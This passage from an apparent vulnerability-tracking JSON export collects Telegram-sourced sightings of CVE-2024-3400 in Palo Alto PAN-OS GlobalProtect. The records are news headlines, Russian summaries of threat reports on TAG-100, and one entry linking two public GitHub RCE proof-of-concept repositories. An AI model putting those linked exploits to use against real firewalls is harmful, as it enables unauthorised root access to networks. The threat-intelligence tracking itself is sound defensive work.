\u0434\u0430\u043d\u043d\u044b\u0445 Active Directory (ntds.dit), \u043a\u043b\u044e\u0447\u0435\u0432\u044b\u0435 \u0434\u0430\u043d\u043d\u044b\u0435 (DPAPI) \u0438 \u0436\u0443\u0440\u043d\u0430\u043b\u044b \u0441\u043e\u0431\u044b\u0442\u0438\u0439 Windows, \u0430 \u0442\u0430\u043a\u0436\u0435 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044e \u0434\u043b\u044f \u0432\u0445\u043e\u0434\u0430 \u0432 \u0441\u0438\u0441\u0442\u0435\u043c\u0443, \u0444\u0430\u0439\u043b\u044b cookie \u0438 \u0434\u0430\u043d\u043d\u044b\u0435 \u0431\u0440\u0430\u0443\u0437\u0435\u0440\u043e\u0432.\n\nVolexity \u043f\u043e\u043b\u0430\u0433\u0430\u0435\u0442, \u0447\u0442\u043e \u0437\u0430\u043c\u0435\u0447\u0435\u043d\u043d\u0430\u044f \u0430\u043a\u0442\u0438\u0432\u043d\u043e\u0441\u0442\u044c \u0438\u043d\u0438\u0446\u0438\u0438\u0440\u0443\u0435\u0442\u0441\u044f \u043e\u0434\u043d\u043e\u0439 \u0433\u0440\u0443\u043f\u043f\u043e\u0439, \u043e\u0434\u043d\u0430\u043a\u043e \u0441\u0432\u044f\u0437\u0430\u0442\u044c \u0435\u0435 \u0441 \u0440\u0430\u043d\u0435\u0435 \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u044b\u043c\u0438 \u0441\u0443\u0431\u044a\u0435\u043a\u0442\u0430\u043c\u0438 \u0443\u0433\u0440\u043e\u0437 \u0438\u043b\u0438 \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u044f\u043c\u0438 \u043f\u043e\u043a\u0430 \u043d\u0435 \u0443\u0434\u0430\u043b\u043e\u0441\u044c. \u0422\u0430\u043a\u0436\u0435 \u043e\u0442\u0441\u0443\u0442\u0441\u0442\u0432\u0443\u0435\u0442 \u043f\u043e\u043d\u0438\u043c\u0430\u043d\u0438\u0435, \u043d\u0430\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u0448\u0438\u0440\u043e\u043a\u043e \u0440\u0430\u0441\u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u043d\u043e\u0439 \u043c\u043e\u0433\u043b\u0430 \u0431\u044b\u0442\u044c \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044f.\n\n\u041f\u0440\u0438 \u044d\u0442\u043e\u043c \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u0437\u0430\u044f\u0432\u043b\u044f\u044e\u0442, \u0447\u0442\u043e \u0438\u043c\u0435\u044e\u0442 \u0434\u043e\u043a\u0430\u0437\u0430\u0442\u0435\u043b\u044c\u0441\u0442\u0432\u0430 \u043f\u043e\u0442\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u043e\u0439 \u0440\u0430\u0437\u0432\u0435\u0434\u044b\u0432\u0430\u0442\u0435\u043b\u044c\u043d\u043e\u0439 \u0434\u0435\u044f\u0442\u0435\u043b\u044c\u043d\u043e\u0441\u0442\u0438, \u0432\u043a\u043b\u044e\u0447\u0430\u044e\u0449\u0435\u0439 \u0431\u043e\u043b\u0435\u0435 \u0448\u0438\u0440\u043e\u043a\u043e\u043c\u0430\u0441\u0448\u0442\u0430\u0431\u043d\u0443\u044e \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044e, \u043d\u0430\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u043d\u0443\u044e \u043d\u0430 \u0432\u044b\u044f\u0432\u043b\u0435\u043d\u0438\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u0445 \u0441\u0438\u0441\u0442\u0435\u043c.\n\n\u0415\u0441\u043b\u0438 \u043f\u0440\u0438\u0431\u043b\u0438\u0437\u0438\u0442\u0435\u043b\u044c\u043d\u043e - \u0442\u043e \u0440\u0435\u0447\u044c \u0438\u0434\u0435\u0442 \u043e \u0434\u0435\u0441\u044f\u0442\u043a\u0430\u0445 \u0442\u044b\u0441\u044f\u0447 \u0436\u0435\u0440\u0442\u0432, \u0432\u0435\u0434\u044c \u043a\u043e\u043b\u0438\u0447\u0435\u0441\u0442\u0432\u043e \u043f\u043e\u0442\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u043e \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u0445 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432 \u043a\u043e\u043b\u0435\u0431\u043b\u0435\u0442\u0441\u044f \u043e\u0442 40\u043a (Shodan) \u0434\u043e 133\u043a (Censys).\n\n\u0418, \u043a\u0430\u043a \u043f\u043e\u043b\u0430\u0433\u0430\u044e\u0442 \u0432 Palo Alto Networks \u0438 Volexity, \u0438\u043d\u0442\u0435\u043d\u0441\u0438\u0432\u043d\u043e\u0441\u0442\u044c \u0430\u0442\u0430\u043a \u043d\u0430 CVE-2024-3400, \u0432\u0435\u0440\u043e\u044f\u0442\u043d\u043e, \u0432 \u0431\u043b\u0438\u0436\u0430\u0439\u0448\u0438\u0435 \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u0434\u043d\u0435\u0439 \u0440\u0435\u0437\u043a\u043e \u0432\u043e\u0437\u0440\u0430\u0441\u0442\u0435\u0442.", "creation_timestamp": "2024-04-15T12:32:26.000000Z"}, {"uuid": "da68eac5-b1a2-4681-aeb0-bb982433032d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "exploited", "source": "https://t.me/true_secator/5979", "content": "\u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u0438\u0437 Recorded Future \u0441\u043e\u043e\u0431\u0449\u0430\u044e\u0442 \u043e \u043d\u043e\u0432\u043e\u0439 APT, \u0437\u0430\u0434\u0435\u0439\u0441\u0442\u0432\u0443\u044e\u0449\u0435\u0439 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u043e\u0432 \u0441 \u043e\u0442\u043a\u0440\u044b\u0442\u044b\u043c \u0438\u0441\u0445\u043e\u0434\u043d\u044b\u043c \u043a\u043e\u0434\u043e\u043c \u0438 \u043d\u0430\u0446\u0435\u043b\u0435\u043d\u043d\u043e\u0439 \u043d\u0430 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0430 \u0441 \u0432\u044b\u0445\u043e\u0434\u043e\u043c \u0432 \u0418\u043d\u0442\u0435\u0440\u043d\u0435\u0442 \u0434\u043b\u044f \u043f\u0440\u043e\u0432\u0435\u0434\u0435\u043d\u0438\u044f \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u0439 \u043f\u043e \u043a\u0438\u0431\u0435\u0440\u0448\u043f\u0438\u043e\u043d\u0430\u0436\u0443.\n\n\u0413\u0440\u0443\u043f\u043f\u0430 \u043e\u0442\u0441\u043b\u0435\u0436\u0438\u0432\u0430\u0435\u0442\u0441\u044f \u043a\u0430\u043a\u00a0TAG-100 \u0438 \u0444\u043e\u043a\u0443\u0441\u0438\u0440\u0443\u0435\u0442 \u043d\u0430 \u0448\u0438\u0440\u043e\u043a\u043e\u043c \u0441\u043f\u0435\u043a\u0442\u0440\u0435 \u0441\u0435\u0442\u0435\u0432\u043e\u0433\u043e \u043e\u0431\u043e\u0440\u0443\u0434\u043e\u0432\u0430\u043d\u0438\u044f, \u0432\u043a\u043b\u044e\u0447\u0430\u044f Citrix NetScaler, F5 BIG-IP, Zimbra, Microsoft Exchange, SonicWall, Cisco ASA, Palo Alto Networks GlobalProtect \u0438 Fortinet FortiGate.\n\n\u041a\u0430\u043a \u043e\u0442\u043c\u0435\u0447\u0430\u044e\u0442 Recorded Future, \u043a \u043d\u0430\u0441\u0442\u043e\u044f\u0449\u0435\u043c\u0443 \u0432\u0440\u0435\u043c\u0435\u043d\u0438 APT \u0443\u0441\u043f\u0435\u0448\u043d\u043e \u0441\u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0438\u0440\u043e\u0432\u0430\u043b\u0430 \u043e\u0440\u0433\u0430\u043d\u0438\u0437\u0430\u0446\u0438\u0438 \u043f\u043e \u043c\u0435\u043d\u044c\u0448\u0435\u0439 \u043c\u0435\u0440\u0435 \u0432 \u0434\u0435\u0441\u044f\u0442\u0438 \u0441\u0442\u0440\u0430\u043d\u0430\u0445, \u0432\u043a\u043b\u044e\u0447\u0430\u044f \u0434\u0432\u0435 \u043c\u0435\u0436\u043f\u0440\u0430\u0432\u0438\u0442\u0435\u043b\u044c\u0441\u0442\u0432\u0435\u043d\u043d\u044b\u0435 \u043e\u0440\u0433\u0430\u043d\u0438\u0437\u0430\u0446\u0438\u0438 \u0410\u0437\u0438\u0430\u0442\u0441\u043a\u043e-\u0422\u0438\u0445\u043e\u043e\u043a\u0435\u0430\u043d\u0441\u043a\u043e\u0433\u043e \u0440\u0435\u0433\u0438\u043e\u043d\u0430.\n\n\u041f\u043e \u043a\u0440\u0430\u0439\u043d\u0435\u0439 \u043c\u0435\u0440\u0435, \u0441 \u0444\u0435\u0432\u0440\u0430\u043b\u044f 2024 \u0433\u043e\u0434\u0430 Insikt Group \u0432\u044b\u044f\u0432\u0438\u043b\u0430 \u0432\u0435\u0440\u043e\u044f\u0442\u043d\u044b\u0435 \u043e\u0440\u0433\u0430\u043d\u0438\u0437\u0430\u0446\u0438\u0438-\u0436\u0435\u0440\u0442\u0432\u044b \u0432 \u041a\u0430\u043c\u0431\u043e\u0434\u0436\u0435, \u0414\u0436\u0438\u0431\u0443\u0442\u0438, \u0414\u043e\u043c\u0438\u043d\u0438\u043a\u0430\u043d\u0435, \u0424\u0438\u0434\u0436\u0438, \u0418\u043d\u0434\u043e\u043d\u0435\u0437\u0438\u0438, \u041d\u0438\u0434\u0435\u0440\u043b\u0430\u043d\u0434\u0430\u0445, \u0422\u0430\u0439\u0432\u0430\u043d\u0435, \u0412\u0435\u043b\u0438\u043a\u043e\u0431\u0440\u0438\u0442\u0430\u043d\u0438\u0438, \u0421\u0428\u0410.\n\n\u041a\u0440\u043e\u043c\u0435 \u0442\u043e\u0433\u043e, TAG-100 \u043f\u0440\u043e\u0432\u043e\u0434\u0438\u043b\u0430 \u0440\u0430\u0437\u0432\u0435\u0434\u044b\u0432\u0430\u0442\u0435\u043b\u044c\u043d\u043e-\u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u043e\u043d\u043d\u0443\u044e \u0434\u0435\u044f\u0442\u0435\u043b\u044c\u043d\u043e\u0441\u0442\u044c, \u043d\u0430\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u043d\u0443\u044e \u043d\u0430 \u0448\u0438\u0440\u043e\u043a\u0438\u0439 \u0441\u043f\u0435\u043a\u0442\u0440 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432 \u0441 \u0432\u044b\u0445\u043e\u0434\u043e\u043c \u0432 \u0418\u043d\u0442\u0435\u0440\u043d\u0435\u0442, \u043f\u0440\u0438\u043d\u0430\u0434\u043b\u0435\u0436\u0430\u0449\u0438\u0435 \u043e\u0440\u0433\u0430\u043d\u0438\u0437\u0430\u0446\u0438\u044f\u043c \u043a\u0430\u043a \u043c\u0438\u043d\u0438\u043c\u0443\u043c \u0432 \u043f\u044f\u0442\u043d\u0430\u0434\u0446\u0430\u0442\u0438 \u0441\u0442\u0440\u0430\u043d\u0430\u0445, \u0432\u043a\u043b\u044e\u0447\u0430\u044f \u041a\u0443\u0431\u0443, \u0424\u0440\u0430\u043d\u0446\u0438\u044e, \u0418\u0442\u0430\u043b\u0438\u044e, \u042f\u043f\u043e\u043d\u0438\u044e \u0438 \u041c\u0430\u043b\u0430\u0439\u0437\u0438\u044e.\n\n\u0421\u0440\u0435\u0434\u0438 \u0436\u0435\u0440\u0442\u0432 \u043e\u0442\u0440\u0430\u0441\u043b\u0435\u0432\u044b\u0435 \u0442\u043e\u0440\u0433\u043e\u0432\u044b\u0435 \u0430\u0441\u0441\u043e\u0446\u0438\u0430\u0446\u0438\u0438, \u043f\u0440\u0430\u0432\u0438\u0442\u0435\u043b\u044c\u0441\u0442\u0432\u0435\u043d\u043d\u044b\u0435, \u043c\u0435\u0436\u043f\u0440\u0430\u0432\u0438\u0442\u0435\u043b\u044c\u0441\u0442\u0432\u0435\u043d\u043d\u044b\u0435, \u0434\u0438\u043f\u043b\u043e\u043c\u0430\u0442\u0438\u0447\u0435\u0441\u043a\u0438\u0435, \u043f\u043e\u043b\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0438\u0435, \u043f\u043e\u043b\u0443\u043f\u0440\u043e\u0432\u043e\u0434\u043d\u0438\u043a\u043e\u0432\u0430\u044f \u043e\u0442\u0440\u0430\u0441\u043b\u044c, \u0430 \u0442\u0430\u043a\u0436\u0435 \u043d\u0435\u043a\u043e\u043c\u043c\u0435\u0440\u0447\u0435\u0441\u043a\u0438\u0435 \u0438 \u0440\u0435\u043b\u0438\u0433\u0438\u043e\u0437\u043d\u044b\u0435 \u043e\u0440\u0433\u0430\u043d\u0438\u0437\u0430\u0446\u0438\u0438.\n\n\u041f\u043e\u043c\u0438\u043c\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u044f \u043e\u0431\u0449\u0435\u0434\u043e\u0441\u0442\u0443\u043f\u043d\u044b\u0445 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u043e\u0432, APT \u0442\u0430\u043a\u0436\u0435 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u0430 \u043c\u043d\u043e\u0436\u0435\u0441\u0442\u0432\u043e \u043e\u0442\u043a\u0440\u044b\u0442\u044b\u0445 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u043e\u0432 \u043d\u0430 \u044d\u0442\u0430\u043f\u0435 \u043f\u043e\u0441\u0442\u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438, \u043d\u0430\u0446\u0435\u043b\u0435\u043d\u043d\u044b\u0445 \u043d\u0430 \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u043e\u043d\u043d\u044b\u0445 \u0441\u0438\u0441\u0442\u0435\u043c, \u0432\u043a\u043b\u044e\u0447\u0430\u044f Pantegana, SparkRAT, LESLIELOADER, Cobalt Strike \u0438 CrossC2.\n\n\u041f\u0440\u0438\u0447\u0435\u043c \u043f\u043e\u0441\u043b\u0435 \u0432\u044b\u043f\u0443\u0441\u043a\u0430 PoC-\u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u0430 \u0434\u043b\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0431\u0440\u0430\u043d\u0434\u043c\u0430\u0443\u044d\u0440\u0430 Palo Alto Networks GlobalProtect CVE-2024-3400 TAG-100 \u043e\u043f\u0435\u0440\u0430\u0442\u0438\u0432\u043d\u043e \u043f\u0440\u043e\u0432\u0435\u043b\u0430 \u0440\u0430\u0437\u0432\u0435\u0434\u043a\u0443 \u0438 \u043f\u0440\u0435\u0434\u043f\u0440\u0438\u043d\u044f\u043b\u0430 \u043f\u043e\u043f\u044b\u0442\u043a\u0443 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043f\u0440\u043e\u0442\u0438\u0432 \u0434\u0435\u0441\u044f\u0442\u043a\u043e\u0432 \u043e\u0440\u0433\u0430\u043d\u0438\u0437\u0430\u0446\u0438\u0439, \u0431\u0430\u0437\u0438\u0440\u0443\u044e\u0449\u0438\u0445\u0441\u044f \u0432 \u0421\u0428\u0410.\n\n\u041d\u0435\u0441\u043c\u043e\u0442\u0440\u044f \u043d\u0430 \u0442\u043e, \u0447\u0442\u043e \u0430\u0442\u0440\u0438\u0431\u0443\u0442\u0438\u0440\u043e\u0432\u0430\u0442\u044c  \u0430\u043a\u0442\u0438\u0432\u043d\u043e\u0441\u0442\u044c TAG-100 \u043d\u0430 \u043e\u0441\u043d\u043e\u0432\u0430\u043d\u0438\u0438 \u0438\u043c\u0435\u044e\u0449\u0438\u0445\u0441\u044f \u0430\u0440\u0442\u0435\u0444\u0430\u043a\u0442\u043e\u0432 \u043d\u0435 \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u0438\u043b\u043e\u0441\u044c \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u044b\u043c, \u0442\u0430\u0440\u0433\u0435\u0442\u0438\u043d\u0433, \u043f\u043e \u043c\u043d\u0435\u043d\u0438\u044e \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439, \u0443\u043a\u0430\u0437\u044b\u0432\u0430\u044e\u0442 \u043d\u0430 \u043f\u0440\u0438\u043d\u0430\u0434\u043b\u0435\u0436\u043d\u043e\u0441\u0442\u044c \u0433\u0440\u0443\u043f\u043f\u044b \u043a \u043a\u0438\u0442\u0430\u0439\u0441\u043a\u043e\u0439 \u0441\u0442\u043e\u0440\u043e\u043d\u0435.\n\n\u041d\u043e, \u044d\u0442\u043e \u0431\u0430\u0437\u0438\u0440\u0443\u0435\u0442\u0441\u044f \u043b\u0438\u0448\u044c \u043d\u0430 \u043a\u043e\u0444\u0435\u0439\u043d\u043e\u0439 \u0433\u0443\u0449\u0435. \u0422\u0430\u043a \u0447\u0442\u043e \u0431\u0443\u0434\u0435\u043c \u043f\u043e\u0441\u043c\u043e\u0442\u0440\u0435\u0442\u044c.", "creation_timestamp": "2024-07-17T15:00:07.000000Z"}, {"uuid": "4937475d-83fd-419a-aa53-f9ff866c88be", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "published-proof-of-concept", "source": "https://t.me/HackerOne/3643", "content": "#CVE-2024-3400 #RCE #Palo_Alto_OS\n\nhttps://github.com/W01fh4cker/CVE-2024-3400-RCE\n\nhttps://github.com/h4x0r-dz/CVE-2024-3400", "creation_timestamp": "2024-04-17T10:39:30.000000Z"}, {"uuid": "f867fd20-d85e-4553-b3e4-d8a25b3dee24", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "exploited", "source": "https://t.me/theninjaway1337/1525", "content": "State-Sponsored Hackers Exploit Zero-Day to Backdoor Palo Alto Networks Firewalls\n\nA threat actor has successfully exploited a zero-day in Palo Alto Networks firewalls for more than two weeks, malware hunters at Volexity warn.\nPalo Alto Networks disclosed the vulnerability\u00a0on Friday, warning that it was aware of limited in-the-wild exploitation and promising patches within the next two days.\nTracked as\u00a0CVE-2024-3400\u00a0(CVSS score of 10/10), the security defect is described as a command injection issue allowing unauthenticated attackers to execute arbitrary code on impacted firewalls, with root privileges.\n\nhttps://www.securityweek.com/state-sponsored-hackers-exploit-zero-day-to-backdoor-palo-alto-networks-firewalls/", "creation_timestamp": "2024-04-15T00:23:33.000000Z"}, {"uuid": "3cd95561-e9aa-4601-980d-c054702a4bd4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "seen", "source": "https://t.me/theninjaway1337/1523", "content": "CVE-2024-3400 PAN-OS: OS Command Injection Vulnerability in GlobalProtect Gateway\n\nA command injection vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS software for specific PAN-OS versions and distinct feature configurations may enable an unauthenticated attacker to execute arbitrary code with root privileges on the firewall.\nFixes for PAN-OS 10.2, PAN-OS 11.0, and PAN-OS 11.1 are in development and are expected to be released by April 14, 2024. Cloud NGFW, Panorama appliances, and Prisma Access are not impacted by this vulnerability. All other versions of PAN-OS are also not impacted.\n\nhttps://security.paloaltonetworks.com/CVE-2024-3400", "creation_timestamp": "2024-04-12T23:43:33.000000Z"}, {"uuid": "e767c3be-154d-4575-b6c8-6c813f858184", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "exploited", "source": "https://t.me/ctinow/215541", "content": "https://ift.tt/fjXhiq0\nCVE-2024-3400: Palo Alto Networks Zero-Day Exploited in the Wild - Security Boulevard", "creation_timestamp": "2024-04-18T00:11:27.000000Z"}, {"uuid": "d37e43bf-ed8a-40a1-936c-79fc0d835edf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "seen", "source": "https://t.me/ctinow/215539", "content": "https://ift.tt/DHCEsx3\nXiid SealedTunnel: Unfazed by Yet Another Critical Firewall Vulnerability (CVE-2024-3400)", "creation_timestamp": "2024-04-17T23:46:40.000000Z"}, {"uuid": "0f90ad96-03d9-4262-a6e9-8b867532b9b1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "seen", "source": "https://t.me/ctinow/215518", "content": "https://ift.tt/cMHaiJs\nXiid SealedTunnel: Unfazed by Yet Another Critical Firewall Vulnerability (CVE-2024-3400)", "creation_timestamp": "2024-04-17T20:32:06.000000Z"}, {"uuid": "9fee4a3b-bd58-4486-b09d-84561f1d9b7f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "seen", "source": "https://t.me/ctinow/215512", "content": "https://ift.tt/BVUsHhY\nXiid SealedTunnel: Unfazed by Yet Another Critical Firewall Vulnerability (CVE-2024-3400)", "creation_timestamp": "2024-04-17T20:21:30.000000Z"}, {"uuid": "dcf44b7e-dd3d-4040-9497-02a3a0f82bdc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "seen", "source": "https://t.me/ctinow/215503", "content": "https://ift.tt/PsS9408\nXiid SealedTunnel: Unfazed by Yet Another Critical Firewall Vulnerability (CVE-2024-3400)", "creation_timestamp": "2024-04-17T18:26:36.000000Z"}, {"uuid": "9708ab21-f082-42a9-8e82-c09e28405a2c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "seen", "source": "https://t.me/ctinow/215482", "content": "https://ift.tt/zio4fxp\nCVE-2024-3400 Exploitation", "creation_timestamp": "2024-04-17T16:16:59.000000Z"}, {"uuid": "7fbe893a-d0d6-447d-8ba6-472ac2b6a92f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "exploited", "source": "https://t.me/ctinow/215383", "content": "https://ift.tt/69GHbxs\nPalo Alto Networks GlobalProtect exploit public and widely exploited CVE-2024-3400, (Tue, Apr 16th)", "creation_timestamp": "2024-04-16T23:16:48.000000Z"}, {"uuid": "06d659b9-53f7-4adc-be20-1941a262da6c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "seen", "source": "https://t.me/ctinow/215234", "content": "https://ift.tt/mfQTzOn\nQuick Palo Alto Networks Global Protect Vulnerablity Update (CVE-2024-3400), (Mon, Apr 15th)", "creation_timestamp": "2024-04-16T02:41:37.000000Z"}, {"uuid": "5a7e4170-5007-4fb1-bde7-7c38c7124c1e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "exploited", "source": "https://t.me/ctinow/215202", "content": "https://ift.tt/yqm91k5\nPalo Alto Patches 0-Day (CVE-2024-3400) Exploited by Python Backdoor", "creation_timestamp": "2024-04-15T20:36:45.000000Z"}, {"uuid": "20d23b26-470c-4137-ba70-e0877f5aab28", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "seen", "source": "https://t.me/ctinow/215087", "content": "https://ift.tt/KNpojGv\nCVE-2024-3400: What You Need to Know About the Critical PAN-OS Zero-Day - CrowdStrike", "creation_timestamp": "2024-04-14T09:31:50.000000Z"}, {"uuid": "9c8144bb-d4c0-48e6-8d2b-f49edd01920e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "seen", "source": "https://t.me/ctinow/215073", "content": "https://ift.tt/GupbZMV\nCritical Palo Alto GlobalProtect Vulnerability Exploited (CVE-2024-3400), (Sat, Apr 13th)", "creation_timestamp": "2024-04-13T16:31:38.000000Z"}, {"uuid": "45211547-9168-4023-921e-824f6eb81101", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "seen", "source": "https://t.me/ctinow/215016", "content": "https://ift.tt/nEPSX8y\nCVE-2024-3400 exploited: Unit 42, Volexity share more details about the attacks", "creation_timestamp": "2024-04-12T21:41:46.000000Z"}, {"uuid": "8b691dec-90bd-4e7f-bca2-5c3b62a5893d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "seen", "source": "https://t.me/ctinow/214996", "content": "https://ift.tt/UePw3Lu\nPalo Alto Networks Releases Guidance for Vulnerability in PAN-OS, CVE-2024-3400", "creation_timestamp": "2024-04-12T18:31:47.000000Z"}, {"uuid": "10c7c485-c2c3-465d-9c5d-571be6d8aee7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "seen", "source": "https://t.me/ctinow/214930", "content": "https://ift.tt/eJGh2k9\nPalo Alto Networks firewalls under attack, hotfixes incoming! (CVE-2024-3400)", "creation_timestamp": "2024-04-12T10:31:27.000000Z"}, {"uuid": "b6f1ee9b-f93c-4c29-9728-ea2bcc9505b8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "exploited", "source": "https://t.me/thehackernews/4811", "content": "\ud83d\uded1 URGENT - Critical zero-day security vulnerability (CVE-2024-3400) discovered in Palo Alto Networks firewalls. \n \nHackers are already exploiting it in the wild, enabling them \"to execute arbitrary code with root privileges.\" \n \nDetails\ud83d\udc47 https://thehackernews.com/2024/04/zero-day-alert-critical-palo-alto.html", "creation_timestamp": "2024-04-12T11:00:53.000000Z"}, {"uuid": "b4904888-c153-4faf-8283-a2d610eef74c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "exploited", "source": "https://t.me/information_security_channel/52022", "content": "Siemens Industrial Product Impacted by Exploited Palo Alto Firewall Vulnerability\nhttps://www.securityweek.com/siemens-industrial-product-impacted-by-exploited-palo-alto-firewall-vulnerability/\n\nPalo Alto Networks firewall vulnerability CVE-2024-3400, exploited as a zero-day, impacts a Siemens industrial product.\nThe post Siemens Industrial Product Impacted by Exploited Palo Alto Firewall Vulnerability (https://www.securityweek.com/siemens-industrial-product-impacted-by-exploited-palo-alto-firewall-vulnerability/) appeared first on SecurityWeek (https://www.securityweek.com/).", "creation_timestamp": "2024-04-23T13:04:33.000000Z"}, {"uuid": "15f79ad7-bd12-416d-860e-196c123e18c0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "exploited", "source": "https://t.me/information_security_channel/52015", "content": "Thousands of Palo Alto Firewalls Potentially Impacted by Exploited Vulnerability\u00a0\nhttps://www.securityweek.com/thousands-of-palo-alto-firewalls-potentially-impacted-by-exploited-vulnerability/\n\nShadowserver has identified roughly 6,000 internet-accessible Palo Alto Networks firewalls potentially vulnerable to CVE-2024-3400.\nThe post Thousands of Palo Alto Firewalls Potentially Impacted by Exploited Vulnerability\u00a0 (https://www.securityweek.com/thousands-of-palo-alto-firewalls-potentially-impacted-by-exploited-vulnerability/) appeared first on SecurityWeek (https://www.securityweek.com/).", "creation_timestamp": "2024-04-22T14:16:05.000000Z"}, {"uuid": "760d6888-0ce9-4a1b-8dc2-6d07e2934128", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": 